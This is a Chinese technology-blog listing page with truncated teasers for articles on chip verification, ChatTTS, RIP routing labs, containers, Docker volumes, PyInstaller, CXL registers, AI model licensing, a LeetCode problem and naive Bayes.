芯片验证分享1 —— 开篇及名词解释

芯片验证分享1 —— 开篇及名词解释

大家好&#xff0c;我是谷公子的藏经阁&#xff0c;今天和大家很高兴能和大家分享的是芯片验证中的一些内容&#xff0c;希望对大家的日常工作有所帮助&#xff0c;如果这些内容有帮助到大家的话&#xff0c;那么此次的分享就很值得。另外&#xff0c;对于这个课题&#xff0c;…
阅读更多...
ChatTTS增强版,增强音质、批量处理、固定音色、支持长文本

ChatTTS增强版,增强音质、批量处理、固定音色、支持长文本

大家好&#xff0c;最近ChatTTS文字生成语音项目挺火。只需要输入一段文字&#xff0c;就可以生成一段非常逼真的声音。声音的效果非常不错。它支持英文和中文两种语言。我在原版的基础上做了一些改动&#xff0c;整合包分享给大家。 功能介绍 除了基础的文本生成音频功能以外…
阅读更多...
实验10 RIP协议配置

实验10 RIP协议配置

实验10 RIP协议配置 一、原理描述二、RIPv1配置&#xff08;一&#xff09;实验目的&#xff08;二&#xff09;实验内容&#xff08;三&#xff09;实验配置&#xff08;四&#xff09;实验步骤 三、 RIPv2配置&#xff08;一&#xff09;实验目的&#xff08;二&#xff09;实…
阅读更多...
IT闲谈——什么是容器?

IT闲谈——什么是容器?

目录 什么是容器一、容器的起源与发展二、目前使用较多的容器三、容器能用来做什么四、容器的应用场景 什么是容器 随着云计算和微服务的兴起&#xff0c;容器技术逐渐成为IT行业的热门话题。容器&#xff0c;简而言之&#xff0c;是一种轻量级的、可移植的、独立的软件包&…
阅读更多...
【Python】轻松打包:CentOS7上使用PyInstaller将Shell脚本转换为可执行文件的完美指南

【Python】轻松打包:CentOS7上使用PyInstaller将Shell脚本转换为可执行文件的完美指南

【Python】轻松打包&#xff1a;CentOS7上使用PyInstaller将Shell脚本转换为可执行文件的完美指南 大家好 我是寸铁&#x1f44a; 总结了一篇【Python】轻松打包&#xff1a;CentOS7上使用PyInstaller将Shell脚本转换为可执行文件的完美指南✨ 喜欢的小伙伴可以点点关注 &#…
阅读更多...
【CXL协议-控制和状态寄存器(8)】

【CXL协议-控制和状态寄存器(8)】

8.0 控制和状态寄存器 Compute Express Link 设备控制和状态寄存器被映射到单独的空间&#xff1a;配置空间和内存映射空间。配置空间寄存器使用配置读取和配置写入进行访问。内存映射寄存器使用内存读取和内存写入进行访问。表 123 总结了本章中定义的寄存器位的属性。除非另…
阅读更多...
人员身份级的数据中心机房作业随工

人员身份级的数据中心机房作业随工

电信运营商的数据中心机房作为承载各类业务系统的物理基础&#xff0c;其运维安全直接关系到业务的连续性和数据的安全性。传统的机房管理方式依赖人工审核和监督&#xff0c;存在效率低下、安全隐患多等问题。因此&#xff0c;通过综合运用物联网、大数据分析和人工智能技术&a…
阅读更多...
机器学习AI大模型的开源与闭源:哪个更好?

机器学习AI大模型的开源与闭源:哪个更好?

文章目录 前言一、开源AI模型1.1 开源的优点1.2 开源的缺点 二、闭源AI模型2.1 闭源的优点2.2 闭源的缺点 三、开源与闭源的平衡3.1 开源与闭源结合的案例3.2 开源与闭源的战略选择 小结 前言 在过去的几年里&#xff0c;人工智能&#xff08;AI&#xff09;和机器学习&#xf…
阅读更多...
Docker 基础使用(3) 存储卷

Docker 基础使用(3) 存储卷

文章目录 存储卷的含义存储卷的分类存储卷的作用存储卷的使用存储卷实际使用案例 ---- MySQL灾难恢复存储卷的局限 Docker 基础使用&#xff08;0&#xff09;基础认识 Docker 基础使用 (1) 使用流程概览 Docker 基础使用&#xff08;2&#xff09; 镜像与容器 Docker 基础使用…
阅读更多...
LeetCode24_两两交换链表中的节点

LeetCode24_两两交换链表中的节点

. - 力扣&#xff08;LeetCode&#xff09; 一、题目&#xff1a; 二、模拟 1. 第一步 2. 第二步&#xff1a;current next.next 3. 第三步: next.next current 4. 第四步&#xff1a;pre.next next; 到这里为止实现了两个节点的交换 5. 第五步&#xff1a;pre current;…
阅读更多...
【机器学习】朴素贝叶斯算法及其应用探索

【机器学习】朴素贝叶斯算法及其应用探索

&#x1f308;个人主页: 鑫宝Code &#x1f525;热门专栏: 闲话杂谈&#xff5c; 炫酷HTML | JavaScript基础 ​&#x1f4ab;个人格言: "如无必要&#xff0c;勿增实体" 文章目录 朴素贝叶斯算法及其应用探索引言1. 朴素贝叶斯基本概念1.1 贝叶斯定理回顾1.2 朴…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023